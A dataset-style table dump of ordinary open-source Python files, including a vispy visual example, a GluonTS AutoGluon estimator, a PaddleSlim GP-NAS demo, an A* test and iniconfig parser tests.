max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars) |
---|---|---|---|---|
gfwlist/gen.py | lipeijian/shadowsocks-android | 137 | 8140 |
#!/usr/bin/python
# -*- encoding: utf8 -*-
import itertools
import math
import sys
import IPy
def main():
china_list_set = IPy.IPSet()
for line in sys.stdin:
china_list_set.add(IPy.IP(line))
# Print the aggregated result
for ip in china_list_set:
print '<item>' + str(ip) + '</item>'
if __name__ == "__main__":
main()
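# Usage sketch (assumption: stdin carries one IP/CIDR per line, e.g. a China
# route list; the file names below are hypothetical):
#   python gen.py < chnroutes.txt > china_ip_list.xml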
|
examples/basics/visuals/line_prototype.py | 3DAlgoLab/vispy | 2,617 | 8174 | # -*- coding: utf-8 -*-
# vispy: gallery 10
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import sys
import numpy as np
from vispy import app, gloo, visuals
from vispy.visuals.filters import Clipper, ColorFilter
from vispy.visuals.shaders import MultiProgram
from vispy.visuals.collections import PointCollection
from vispy.visuals.transforms import STTransform
from vispy.scene import SceneCanvas
from vispy.scene.visuals import create_visual_node
class LineVisual(visuals.Visual):
"""Example of a very simple GL-line visual.
This shows the minimal set of methods that need to be reimplemented to
make a new visual class.
"""
def __init__(self, pos=None, color=(1, 1, 1, 1)):
vcode = """
attribute vec2 a_pos;
void main() {
gl_Position = $transform(vec4(a_pos, 0., 1.));
gl_PointSize = 10.;
}
"""
fcode = """
void main() {
gl_FragColor = $color;
}
"""
visuals.Visual.__init__(self, vcode=vcode, fcode=fcode)
self.pos_buf = gloo.VertexBuffer()
# The Visual superclass contains a MultiProgram, which is an object
# that behaves like a normal shader program (you can assign shader
# code, upload values, set template variables, etc.) but internally
# manages multiple ModularProgram instances, one per view.
# The MultiProgram is accessed via the `shared_program` property, so
# the following modifications to the program will be applied to all
# views:
self.shared_program['a_pos'] = self.pos_buf
self.shared_program.frag['color'] = color
self._need_upload = False
# Visual keeps track of draw mode, index buffer, and GL state. These
# are shared between all views.
self._draw_mode = 'line_strip'
self.set_gl_state('translucent', depth_test=False)
if pos is not None:
self.set_data(pos)
def set_data(self, pos):
self._pos = pos
self._need_upload = True
def _prepare_transforms(self, view=None):
view.view_program.vert['transform'] = view.transforms.get_transform()
def _prepare_draw(self, view=None):
"""This method is called immediately before each draw.
The *view* argument indicates which view is about to be drawn.
"""
if self._need_upload:
# Note that pos_buf is shared between all views, so we have no need
# to use the *view* argument in this example. This will be true
# for most visuals.
self.pos_buf.set_data(self._pos)
self._need_upload = False
class PointVisual(LineVisual):
"""Another simple visual class.
Due to the simplicity of these example classes, it was only necessary to
subclass from LineVisual and set the draw mode to 'points'. A more
fully-featured PointVisual class might not follow this approach.
"""
def __init__(self, pos=None, color=(1, 1, 1, 1)):
LineVisual.__init__(self, pos, color)
self._draw_mode = 'points'
class PlotLineVisual(visuals.CompoundVisual):
"""An example compound visual that draws lines and points.
To the user, the compound visual behaves exactly like a normal visual--it
has a transform system, draw() and bounds() methods, etc. Internally, the
compound visual automatically manages proxying these transforms and methods
to its sub-visuals.
"""
def __init__(self, pos=None, line_color=(1, 1, 1, 1),
point_color=(1, 1, 1, 1)):
self._line = LineVisual(pos, color=line_color)
self._point = PointVisual(pos, color=point_color)
visuals.CompoundVisual.__init__(self, [self._line, self._point])
class PointCollectionVisual(visuals.Visual):
"""Thin wrapper around a point collection.
Note: This is currently broken!
"""
def __init__(self):
prog = MultiProgram(vcode='', fcode='')
self.points = PointCollection("agg", color="shared", program=prog)
visuals.Visual.__init__(self, program=prog)
def _prepare_draw(self, view):
if self.points._need_update:
self.points._update()
self._draw_mode = self.points._mode
self._index_buffer = self.points._indices_buffer
def append(self, *args, **kwargs):
self.points.append(*args, **kwargs)
def _prepare_transforms(self, view=None):
pass
@property
def color(self):
return self.points['color']
@color.setter
def color(self, c):
self.points['color'] = c
class PanZoomTransform(STTransform):
def __init__(self, canvas=None, aspect=None, **kwargs):
self._aspect = aspect
self.attach(canvas)
STTransform.__init__(self, **kwargs)
def attach(self, canvas):
""" Attach this tranform to a canvas """
self._canvas = canvas
canvas.events.mouse_wheel.connect(self.on_mouse_wheel)
canvas.events.mouse_move.connect(self.on_mouse_move)
def on_mouse_move(self, event):
if event.is_dragging:
dxy = event.pos - event.last_event.pos
button = event.press_event.button
if button == 1:
self.move(dxy)
elif button == 2:
center = event.press_event.pos
if self._aspect is None:
self.zoom(np.exp(dxy * (0.01, -0.01)), center)
else:
s = dxy[1] * -0.01
self.zoom(np.exp(np.array([s, s])), center)
def on_mouse_wheel(self, event):
self.zoom(np.exp(event.delta * (0.01, -0.01)), event.pos)
canvas = app.Canvas(keys='interactive', size=(900, 600), show=True,
title="Visual Canvas")
pos = np.random.normal(size=(1000, 2), loc=0, scale=50).astype('float32')
pos[0] = [0, 0]
# Make a line visual
line = LineVisual(pos=pos)
line.transforms.canvas = canvas
line.transform = STTransform(scale=(2, 1), translate=(20, 20))
panzoom = PanZoomTransform(canvas)
line.transforms.scene_transform = panzoom
panzoom.changed.connect(lambda ev: canvas.update())
# Attach color filter to all views (current and future) of the visual
line.attach(ColorFilter((1, 1, 0.5, 0.7)))
# Attach a clipper just to this view. The Clipper filter requires a
# transform that maps from the framebuffer coordinate system to the
# clipping coordinates.
tr = line.transforms.get_transform('framebuffer', 'canvas')
line.attach(Clipper((20, 20, 260, 260), transform=tr), view=line)
# Make a view of the line that will draw its shadow
shadow = line.view()
shadow.transforms.canvas = canvas
shadow.transform = STTransform(scale=(2, 1), translate=(25, 25))
shadow.transforms.scene_transform = panzoom
shadow.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow)
tr = shadow.transforms.get_transform('framebuffer', 'canvas')
shadow.attach(Clipper((20, 20, 260, 260), transform=tr), view=shadow)
# And make a second view of the line with different clipping bounds
view = line.view()
view.transforms.canvas = canvas
view.transform = STTransform(scale=(2, 0.5), translate=(450, 150))
tr = view.transforms.get_transform('framebuffer', 'canvas')
view.attach(Clipper((320, 20, 260, 260), transform=tr), view=view)
# Make a compound visual
plot = PlotLineVisual(pos, (0.5, 1, 0.5, 0.2), (0.5, 1, 1, 0.3))
plot.transforms.canvas = canvas
plot.transform = STTransform(translate=(80, 450), scale=(1.5, 1))
tr = plot.transforms.get_transform('framebuffer', 'canvas')
plot.attach(Clipper((20, 320, 260, 260), transform=tr), view=plot)
# And make a view on the compound
view2 = plot.view()
view2.transforms.canvas = canvas
view2.transform = STTransform(scale=(1.5, 1), translate=(450, 400))
tr = view2.transforms.get_transform('framebuffer', 'canvas')
view2.attach(Clipper((320, 320, 260, 260), transform=tr), view=view2)
# And a shadow for the view
shadow2 = plot.view()
shadow2.transforms.canvas = canvas
shadow2.transform = STTransform(scale=(1.5, 1), translate=(455, 405))
shadow2.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow2)
tr = shadow2.transforms.get_transform('framebuffer', 'canvas')
shadow2.attach(Clipper((320, 320, 260, 260), transform=tr), view=shadow2)
# Example of a collection visual
collection = PointCollectionVisual()
collection.transforms.canvas = canvas
collection.transform = STTransform(translate=(750, 150))
collection.append(np.random.normal(loc=0, scale=20, size=(10000, 3)),
itemsize=5000)
collection.color = (1, 0.5, 0.5, 1), (0.5, 0.5, 1, 1)
shadow3 = collection.view()
shadow3.transforms.canvas = canvas
shadow3.transform = STTransform(scale=(1, 1), translate=(752, 152))
shadow3.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow3)
# tr = shadow3.transforms.get_transform('framebuffer', 'canvas')
# shadow3.attach(Clipper((320, 320, 260, 260), transform=tr), view=shadow2)
order = [shadow, line, view, plot, shadow2, view2, shadow3, collection]
@canvas.connect
def on_draw(event):
canvas.context.clear((0.3, 0.3, 0.3, 1.0))
for v in order:
v.draw()
def on_resize(event):
# Set canvas viewport and reconfigure visual transforms to match.
vp = (0, 0, canvas.physical_size[0], canvas.physical_size[1])
canvas.context.set_viewport(*vp)
for v in order:
v.transforms.configure(canvas=canvas, viewport=vp)
canvas.events.resize.connect(on_resize)
on_resize(None)
Line = create_visual_node(LineVisual)
canvas2 = SceneCanvas(keys='interactive', title='Scene Canvas', show=True)
v = canvas2.central_widget.add_view(margin=10)
v.border_color = (1, 1, 1, 1)
v.bgcolor = (0.3, 0.3, 0.3, 1)
v.camera = 'panzoom'
line2 = Line(pos, parent=v.scene)
def mouse(ev):
print(ev)
v.events.mouse_press.connect(mouse)
if __name__ == '__main__':
if sys.flags.interactive != 1:
app.run()
|
util/util.py | harshitAgr/vess2ret | 111 | 8177 | """Auxiliary methods."""
import os
import json
from errno import EEXIST
import numpy as np
import seaborn as sns
import cPickle as pickle
import matplotlib.pyplot as plt
sns.set()
DEFAULT_LOG_DIR = 'log'
ATOB_WEIGHTS_FILE = 'atob_weights.h5'
D_WEIGHTS_FILE = 'd_weights.h5'
class MyDict(dict):
"""
Dictionary that allows accessing elements with dot notation.
ex:
>> d = MyDict({'key': 'val'})
>> d.key
'val'
>> d.key2 = 'val2'
>> d
{'key2': 'val2', 'key': 'val'}
"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
def convert_to_rgb(img, is_binary=False):
"""Given an image, make sure it has 3 channels and that it is between 0 and 1."""
if len(img.shape) != 3:
raise Exception("""Image must have 3 dimensions (channels x height x width). """
"""Given {0}""".format(len(img.shape)))
img_ch, _, _ = img.shape
if img_ch != 3 and img_ch != 1:
raise Exception("""Unsupported number of channels. """
"""Must be 1 or 3, given {0}.""".format(img_ch))
imgp = img
if img_ch == 1:
imgp = np.repeat(img, 3, axis=0)
if not is_binary:
imgp = imgp * 127.5 + 127.5
imgp /= 255.
return np.clip(imgp.transpose((1, 2, 0)), 0, 1)
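# Example (assumption: a single-channel, tanh-scaled generator output of shape
# (1, 256, 256); the shape is hypothetical):
#   rgb = convert_to_rgb(img)  # -> shape (256, 256, 3), values clipped to [0, 1]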
def compose_imgs(a, b, is_a_binary=True, is_b_binary=False):
"""Place a and b side by side to be plotted."""
ap = convert_to_rgb(a, is_binary=is_a_binary)
bp = convert_to_rgb(b, is_binary=is_b_binary)
if ap.shape != bp.shape:
raise Exception("""A and B must have the same size. """
"""{0} != {1}""".format(ap.shape, bp.shape))
# ap.shape and bp.shape must have the same size here
h, w, ch = ap.shape
composed = np.zeros((h, 2*w, ch))
composed[:, :w, :] = ap
composed[:, w:, :] = bp
return composed
def get_log_dir(log_dir, expt_name):
"""Compose the log_dir with the experiment name."""
if log_dir is None:
raise Exception('log_dir can not be None.')
if expt_name is not None:
return os.path.join(log_dir, expt_name)
return log_dir
def mkdir(mypath):
"""Create a directory if it does not exist."""
try:
os.makedirs(mypath)
except OSError as exc:
if exc.errno == EEXIST and os.path.isdir(mypath):
pass
else:
raise
def create_expt_dir(params):
"""Create the experiment directory and return it."""
expt_dir = get_log_dir(params.log_dir, params.expt_name)
# Create directories if they do not exist
mkdir(params.log_dir)
mkdir(expt_dir)
# Save the parameters
json.dump(params, open(os.path.join(expt_dir, 'params.json'), 'wb'),
indent=4, sort_keys=True)
return expt_dir
def plot_loss(loss, label, filename, log_dir):
"""Plot a loss function and save it in a file."""
plt.figure(figsize=(5, 4))
plt.plot(loss, label=label)
plt.legend()
plt.savefig(os.path.join(log_dir, filename))
plt.clf()
def log(losses, atob, it_val, N=4, log_dir=DEFAULT_LOG_DIR, expt_name=None,
is_a_binary=True, is_b_binary=False):
"""Log losses and atob results."""
log_dir = get_log_dir(log_dir, expt_name)
# Save the losses for further inspection
pickle.dump(losses, open(os.path.join(log_dir, 'losses.pkl'), 'wb'))
###########################################################################
# PLOT THE LOSSES #
###########################################################################
plot_loss(losses['d'], 'discriminator', 'd_loss.png', log_dir)
plot_loss(losses['d_val'], 'discriminator validation', 'd_val_loss.png', log_dir)
plot_loss(losses['p2p'], 'Pix2Pix', 'p2p_loss.png', log_dir)
plot_loss(losses['p2p_val'], 'Pix2Pix validation', 'p2p_val_loss.png', log_dir)
###########################################################################
# PLOT THE A->B RESULTS #
###########################################################################
plt.figure(figsize=(10, 6))
for i in range(N*N):
a, _ = next(it_val)
bp = atob.predict(a)
img = compose_imgs(a[0], bp[0], is_a_binary=is_a_binary, is_b_binary=is_b_binary)
plt.subplot(N, N, i+1)
plt.imshow(img)
plt.axis('off')
plt.savefig(os.path.join(log_dir, 'atob.png'))
plt.clf()
# Make sure all the figures are closed.
plt.close('all')
def save_weights(models, log_dir=DEFAULT_LOG_DIR, expt_name=None):
"""Save the weights of the models into a file."""
log_dir = get_log_dir(log_dir, expt_name)
models.atob.save_weights(os.path.join(log_dir, ATOB_WEIGHTS_FILE), overwrite=True)
models.d.save_weights(os.path.join(log_dir, D_WEIGHTS_FILE), overwrite=True)
def load_weights(atob, d, log_dir=DEFAULT_LOG_DIR, expt_name=None):
"""Load the weights into the corresponding models."""
log_dir = get_log_dir(log_dir, expt_name)
atob.load_weights(os.path.join(log_dir, ATOB_WEIGHTS_FILE))
d.load_weights(os.path.join(log_dir, D_WEIGHTS_FILE))
def load_weights_of(m, weights_file, log_dir=DEFAULT_LOG_DIR, expt_name=None):
"""Load the weights of the model m."""
log_dir = get_log_dir(log_dir, expt_name)
m.load_weights(os.path.join(log_dir, weights_file))
def load_losses(log_dir=DEFAULT_LOG_DIR, expt_name=None):
"""Load the losses of the given experiment."""
log_dir = get_log_dir(log_dir, expt_name)
losses = pickle.load(open(os.path.join(log_dir, 'losses.pkl'), 'rb'))
return losses
def load_params(params):
"""
Load the parameters of an experiment and return them.
The params passed as argument will be merged with the new params dict.
If there is a conflict with a key, the params passed as argument prevails.
"""
expt_dir = get_log_dir(params.log_dir, params.expt_name)
expt_params = json.load(open(os.path.join(expt_dir, 'params.json'), 'rb'))
# Update the loaded parameters with the current parameters. This will
# override conflicting keys as expected.
expt_params.update(params)
return expt_params
|
demo/gpnas/CVPR2021_NAS_competition_gpnas_demo.py | ZichaoGuo/PaddleSlim | 926 | 8203 |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import copy
import numpy as np
from paddleslim.nas import GPNAS
# Demo of using GP-NAS in Track 2 of the [CVPR 2021 NAS competition](https://www.cvpr21-nas.com/competition)
# [CVPR 2021 NAS competition Track 2 AI Studio page](https://aistudio.baidu.com/aistudio/competition/detail/71?lang=en)
# [AI Studio GP-NAS demo](https://aistudio.baidu.com/aistudio/projectdetail/1824958)
# The demo is based on GP-NAS (Gaussian Process based Neural Architecture Search), PaddleSlim's in-house NAS algorithm
# An improved version of this demo was eligible for double prize money
def preprare_trainning_data(file_name, t_flag):
## t_flag == 1: use all training data
## t_flag == 2: use half of the training data
with open(file_name, 'r') as f:
arch_dict = json.load(f)
Y_all = []
X_all = []
for sub_dict in arch_dict.items():
Y_all.append(sub_dict[1]['acc'] * 100)
X_all.append(np.array(sub_dict[1]['arch']).T.reshape(4, 16)[2])
X_all, Y_all = np.array(X_all), np.array(Y_all)
X_train, Y_train, X_test, Y_test = X_all[0::t_flag], Y_all[
0::t_flag], X_all[1::t_flag], Y_all[1::t_flag]
return X_train, Y_train, X_test, Y_test
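# The split above is a stride over the architecture list. For example, with
# t_flag=2 the even-indexed entries (X_all[0::2]) become the training split and
# the odd-indexed entries (X_all[1::2]) the test split; with t_flag=1 the
# training split is the full data set.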
if __name__ == '__main__':
stage1_file = './datasets/Track2_stage1_trainning.json'
stage2_file = './datasets/Track2_stage2_few_show_trainning.json'
X_train_stage1, Y_train_stage1, X_test_stage1, Y_test_stage1 = preprare_trainning_data(
stage1_file, 1)
X_train_stage2, Y_train_stage2, X_test_stage2, Y_test_stage2 = preprare_trainning_data(
stage2_file, 2)
gpnas = GPNAS()
w = gpnas.get_initial_mean(X_test_stage1, Y_test_stage1)
init_cov = gpnas.get_initial_cov(X_train_stage1)
error_list = np.array(
Y_test_stage2.reshape(len(Y_test_stage2), 1) - gpnas.get_predict(
X_test_stage2))
print('RMSE training on stage1 testing on stage2:',
np.sqrt(np.dot(error_list.T, error_list) / len(error_list)))
gpnas.get_posterior_mean(X_train_stage2[0::3], Y_train_stage2[0::3])
gpnas.get_posterior_mean(X_train_stage2[1::3], Y_train_stage2[1::3])
gpnas.get_posterior_cov(X_train_stage2[1::3], Y_train_stage2[1::3])
error_list = np.array(
Y_test_stage2.reshape(len(Y_test_stage2), 1) - gpnas.get_predict_jiont(
X_test_stage2, X_train_stage2[::1], Y_train_stage2[::1]))
print('RMSE using stage1 as prior:',
np.sqrt(np.dot(error_list.T, error_list) / len(error_list)))
|
windows_packages_gpu/torch/nn/intrinsic/qat/modules/linear_relu.py | codeproject/DeepStack | 353 | 8207 | from __future__ import absolute_import, division, print_function, unicode_literals
import torch.nn.qat as nnqat
import torch.nn.intrinsic
import torch.nn.functional as F
class LinearReLU(nnqat.Linear):
r"""
A LinearReLU module fused from Linear and ReLU modules, attached with
FakeQuantize modules for output activation and weight, used in
quantization aware training.
We adopt the same interface as :class:`torch.nn.Linear`.
Similar to `torch.nn.intrinsic.LinearReLU`, with FakeQuantize modules initialized to
default.
Attributes:
activation_post_process: fake quant module for output activation
weight: fake quant module for weight
Examples::
>>> m = nn.qat.LinearReLU(20, 30)
>>> input = torch.randn(128, 20)
>>> output = m(input)
>>> print(output.size())
torch.Size([128, 30])
"""
_FLOAT_MODULE = torch.nn.intrinsic.LinearReLU
def __init__(self, in_features, out_features, bias=True,
qconfig=None):
super(LinearReLU, self).__init__(in_features, out_features, bias, qconfig)
def forward(self, input):
return self.activation_post_process(F.relu(
F.linear(input, self.weight_fake_quant(self.weight), self.bias)))
@classmethod
def from_float(cls, mod, qconfig=None):
return super(LinearReLU, cls).from_float(mod, qconfig)
|
tests/basic/test_basic.py | kopp/python-astar | 133 | 8219 | import unittest
import astar
class BasicTests(unittest.TestCase):
def test_bestpath(self):
"""ensure that we take the shortest path, and not the path with less elements.
the path with less elements is A -> B with a distance of 100
the shortest path is A -> C -> D -> B with a distance of 60
"""
nodes = {'A': [('B', 100), ('C', 20)],
'C': [('D', 20)], 'D': [('B', 20)]}
def neighbors(n):
for n1, d in nodes[n]:
yield n1
def distance(n1, n2):
for n, d in nodes[n1]:
if n == n2:
return d
def cost(n, goal):
return 1
path = list(astar.find_path('A', 'B', neighbors_fnct=neighbors,
heuristic_cost_estimate_fnct=cost, distance_between_fnct=distance))
self.assertEqual(4, len(path))
for i, n in enumerate('ACDB'):
self.assertEqual(n, path[i])
if __name__ == '__main__':
unittest.main()
|
src/gluonts/nursery/autogluon_tabular/estimator.py | Xiaoxiong-Liu/gluon-ts | 2,648 | 8239 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import logging
from typing import Callable, Optional, List, Tuple
import pandas as pd
from autogluon.tabular import TabularPredictor as AutogluonTabularPredictor
from gluonts.core.component import validated
from gluonts.dataset.common import Dataset
from gluonts.dataset.util import to_pandas
from gluonts.model.estimator import Estimator
from gluonts.time_feature import (
TimeFeature,
get_lags_for_frequency,
time_features_from_frequency_str,
)
from .predictor import (
TabularPredictor,
mean_abs_scaling,
get_features_dataframe,
)
logger = logging.getLogger(__name__)
class TabularEstimator(Estimator):
"""An estimator that trains an Autogluon Tabular model for time series
forecasting.
Additional keyword arguments to the constructor, other than the ones documented
below, will be passed on to Autogluon Tabular's ``fit`` method used for training
the model.
Parameters
----------
freq
Frequency of the data to handle
prediction_length
Prediction length
lag_indices
List of indices of the lagged observations to use as features. If
None, this will be set automatically based on the frequency.
time_features
List of time features to be used. If None, this will be set automatically
based on the frequency.
scaling
Function to be used to scale time series. This should take a pd.Series object
as input, and return a scaled pd.Series and the scale (float). By default,
this divides a series by the mean of its absolute value.
batch_size
Batch size of the resulting predictor; this is just used at prediction
time, and does not affect training in any way.
disable_auto_regression
Whether to forcefully disable auto-regression in the model. If ``True``,
this will remove any lag index which is smaller than ``prediction_length``.
This will make predictions more efficient, but may impact their accuracy.
quantiles_to_predict
Whether to forecast quantiles. If a list of quantile levels is given,
the model is trained as a quantile regression model. If None, the model
is trained as a regular (point-forecast) regression model.
"""
@validated()
def __init__(
self,
freq: str,
prediction_length: int,
lag_indices: Optional[List[int]] = None,
time_features: Optional[List[TimeFeature]] = None,
scaling: Callable[
[pd.Series], Tuple[pd.Series, float]
] = mean_abs_scaling,
batch_size: Optional[int] = 32,
disable_auto_regression: bool = False,
last_k_for_val: Optional[int] = None,
quantiles_to_predict: Optional[List[float]] = None,
eval_metric: str = "mean_absolute_error",
**kwargs,
) -> None:
super().__init__()
self.freq = freq
self.prediction_length = prediction_length
self.lag_indices = (
lag_indices
if lag_indices is not None
else get_lags_for_frequency(self.freq)
)
self.time_features = (
time_features
if time_features is not None
else time_features_from_frequency_str(self.freq)
)
self.batch_size = batch_size
self.disable_auto_regression = disable_auto_regression
self.scaling = scaling
self.last_k_for_val = last_k_for_val
self.eval_metric = eval_metric
self.quantiles_to_predict = quantiles_to_predict
if self.disable_auto_regression:
self.lag_indices = [
lag_idx
for lag_idx in self.lag_indices
if lag_idx >= self.prediction_length
]
default_kwargs = {
"time_limit": 60,
# "excluded_model_types": ["KNN", "XT", "RF"],
"presets": [
"high_quality_fast_inference_only_refit",
"optimize_for_deployment",
],
"auto_stack": True,
}
self.kwargs = {**default_kwargs, **kwargs}
def train(
self,
training_data: Dataset,
validation_data: Optional[Dataset] = None,
) -> TabularPredictor:
kwargs_override = {}
dfs = [
get_features_dataframe(
series=self.scaling(to_pandas(entry))[0],
time_features=self.time_features,
lag_indices=self.lag_indices,
)
for entry in training_data
]
if validation_data is not None or self.last_k_for_val is not None:
kwargs_override["auto_stack"] = False
logger.warning(
"Auto Stacking is turned off "
"as validation dataset is provided before input into Tabular Predictor."
)
if validation_data is not None:
logger.log(20, "Validation dataset is directly provided.")
validation_dfs = [
get_features_dataframe(
series=self.scaling(to_pandas(entry))[0],
time_features=self.time_features,
lag_indices=self.lag_indices,
)
for entry in validation_data
]
train_df = pd.concat(dfs)
val_df = pd.concat(validation_dfs)
elif self.last_k_for_val is not None:
logger.log(
20,
f"last_k_for_val is provided, choosing last {self.last_k_for_val} of each time series as validation set.",
)
train_dfs = [
tmp_df.iloc[: -self.last_k_for_val, :] for tmp_df in dfs
]
validation_dfs = [
tmp_df.iloc[-self.last_k_for_val :, :] for tmp_df in dfs
]
train_df = pd.concat(train_dfs)
val_df = pd.concat(validation_dfs)
else:
logger.log(
20,
"No validation dataset is provided, will let TabularPredictor do the splitting automatically,"
"Note that this might break the time order of time series data.",
)
train_df = pd.concat(dfs)
val_df = None
if self.quantiles_to_predict is not None:
ag_model = AutogluonTabularPredictor(
label="target",
problem_type="quantile",
quantile_levels=self.quantiles_to_predict,
).fit(
train_df,
tuning_data=val_df,
**{**self.kwargs, **kwargs_override},
)
else:
ag_model = AutogluonTabularPredictor(
label="target",
problem_type="regression",
eval_metric=self.eval_metric,
).fit(
train_df,
tuning_data=val_df,
**{**self.kwargs, **kwargs_override},
)
return TabularPredictor(
ag_model=ag_model,
freq=self.freq,
prediction_length=self.prediction_length,
time_features=self.time_features,
lag_indices=self.lag_indices,
scaling=self.scaling,
batch_size=self.batch_size,
quantiles_to_predict=self.quantiles_to_predict,
)
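# Minimal usage sketch (assumptions: hourly data, a 24-step horizon, and a
# GluonTS Dataset named `my_train_dataset`; all three are hypothetical):
#   estimator = TabularEstimator(freq="1H", prediction_length=24)
#   predictor = estimator.train(training_data=my_train_dataset)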
|
pre_embed.py | shelleyyyyu/few_shot | 253 | 8251 | import numpy as np
from collections import defaultdict, Counter
import random
import json
from tqdm import tqdm
def transX(dataset):
rel2id = json.load(open(dataset + '/relation2ids'))
ent2id = json.load(open(dataset + '/ent2ids'))
with open('../Fast-TransX/' + dataset + '_base/entity2id.txt', 'w') as g1:
num_ents = len(ent2id.keys())
g1.write(str(num_ents) + '\n')
for k, v in ent2id.items():
g1.write(k + '\t' + str(v) + '\n')
with open('../Fast-TransX/' + dataset + '_base/relation2id.txt', 'w') as g1:
num_rels = len(rel2id.keys())
g1.write(str(num_rels) + '\n')
for k, v in rel2id.items():
g1.write(k + '\t' + str(v) + '\n')
file_name = dataset + '/path_graph'
train_triples = []
with open(file_name) as f:
lines = f.readlines()
for line in tqdm(lines):
e1 = line.split('\t')[0]
e2 = line.rstrip().split('\t')[2]
rel = line.split('\t')[1]
train_triples.append([e1,rel,e2])
train_triples.append([e2,rel+'_inv',e1])
with open('../Fast-TransX/' + dataset + '_base/train2id.txt', 'w') as g3:
num_triples = len(train_triples)
g3.write(str(num_triples) + '\n')
for triple in train_triples:
e1, rel, e2 = triple
g3.write(str(ent2id[e1]) + '\t' + str(ent2id[e2]) + '\t' + str(rel2id[rel]) + '\n')
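# Each file written above follows the Fast-TransX layout assumed by this repo:
# the first line holds the number of entries, and every following line is
# tab-separated ("entity\tid", "relation\tid", or "head_id\ttail_id\trel_id").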
if __name__ == '__main__':
transX('Wiki') |
amadeus/travel/trip_parser_jobs/_status.py | akshitsingla/amadeus-python | 125 | 8279 |
from amadeus.client.decorator import Decorator
class TripParserStatus(Decorator, object):
def __init__(self, client, job_id):
Decorator.__init__(self, client)
self.job_id = job_id
def get(self, **params):
'''
Returns the parsing status and the link to the result
in case of successful parsing.
.. code-block:: python
amadeus.travel.trip_parser_jobs.status('XXX').get
:rtype: amadeus.Response
:raises amadeus.ResponseError: if the request could not be completed
'''
return self.client.get(
'/v2/travel/trip-parser-jobs/{0}'.format(self.job_id),
**params)
|
tools/third_party/iniconfig/testing/test_iniconfig.py | meyerweb/wpt | 2,479 | 8280 |
import py
import pytest
from iniconfig import IniConfig, ParseError, __all__ as ALL
from iniconfig import iscommentline
from textwrap import dedent
check_tokens = {
'section': (
'[section]',
[(0, 'section', None, None)]
),
'value': (
'value = 1',
[(0, None, 'value', '1')]
),
'value in section': (
'[section]\nvalue=1',
[(0, 'section', None, None), (1, 'section', 'value', '1')]
),
'value with continuation': (
'names =\n Alice\n Bob',
[(0, None, 'names', 'Alice\nBob')]
),
'value with aligned continuation': (
'names = Alice\n'
' Bob',
[(0, None, 'names', 'Alice\nBob')]
),
'blank line': (
'[section]\n\nvalue=1',
[(0, 'section', None, None), (2, 'section', 'value', '1')]
),
'comment': (
'# comment',
[]
),
'comment on value': (
'value = 1',
[(0, None, 'value', '1')]
),
'comment on section': (
'[section] #comment',
[(0, 'section', None, None)]
),
'comment2': (
'; comment',
[]
),
'comment2 on section': (
'[section] ;comment',
[(0, 'section', None, None)]
),
'pseudo section syntax in value': (
'name = value []',
[(0, None, 'name', 'value []')]
),
'assignment in value': (
'value = x = 3',
[(0, None, 'value', 'x = 3')]
),
'use of colon for name-values': (
'name: y',
[(0, None, 'name', 'y')]
),
'use of colon without space': (
'value:y=5',
[(0, None, 'value', 'y=5')]
),
'equality gets precedence': (
'value=xyz:5',
[(0, None, 'value', 'xyz:5')]
),
}
@pytest.fixture(params=sorted(check_tokens))
def input_expected(request):
return check_tokens[request.param]
@pytest.fixture
def input(input_expected):
return input_expected[0]
@pytest.fixture
def expected(input_expected):
return input_expected[1]
def parse(input):
# only for testing purposes - _parse() does not use state except path
ini = object.__new__(IniConfig)
ini.path = "sample"
return ini._parse(input.splitlines(True))
def parse_a_error(input):
return py.test.raises(ParseError, parse, input)
def test_tokenize(input, expected):
parsed = parse(input)
assert parsed == expected
def test_parse_empty():
parsed = parse("")
assert not parsed
ini = IniConfig("sample", "")
assert not ini.sections
def test_ParseError():
e = ParseError("filename", 0, "hello")
assert str(e) == "filename:1: hello"
def test_continuation_needs_perceeding_token():
excinfo = parse_a_error(' Foo')
assert excinfo.value.lineno == 0
def test_continuation_cant_be_after_section():
excinfo = parse_a_error('[section]\n Foo')
assert excinfo.value.lineno == 1
def test_section_cant_be_empty():
excinfo = parse_a_error('[]')
assert excinfo.value.lineno == 0
@py.test.mark.parametrize('line', [
'!!',
])
def test_error_on_weird_lines(line):
parse_a_error(line)
def test_iniconfig_from_file(tmpdir):
path = tmpdir/'test.txt'
path.write('[metadata]\nname=1')
config = IniConfig(path=path)
assert list(config.sections) == ['metadata']
config = IniConfig(path, "[diff]")
assert list(config.sections) == ['diff']
with pytest.raises(TypeError):
IniConfig(data=path.read())
def test_iniconfig_section_first(tmpdir):
with pytest.raises(ParseError) as excinfo:
IniConfig("x", data='name=1')
assert excinfo.value.msg == "no section header defined"
def test_iniconig_section_duplicate_fails():
with pytest.raises(ParseError) as excinfo:
IniConfig("x", data='[section]\n[section]')
assert 'duplicate section' in str(excinfo.value)
def test_iniconfig_duplicate_key_fails():
with pytest.raises(ParseError) as excinfo:
IniConfig("x", data='[section]\nname = Alice\nname = bob')
assert 'duplicate name' in str(excinfo.value)
def test_iniconfig_lineof():
config = IniConfig("x.ini", data=(
'[section]\n'
'value = 1\n'
'[section2]\n'
'# comment\n'
'value =2'
))
assert config.lineof('missing') is None
assert config.lineof('section') == 1
assert config.lineof('section2') == 3
assert config.lineof('section', 'value') == 2
assert config.lineof('section2', 'value') == 5
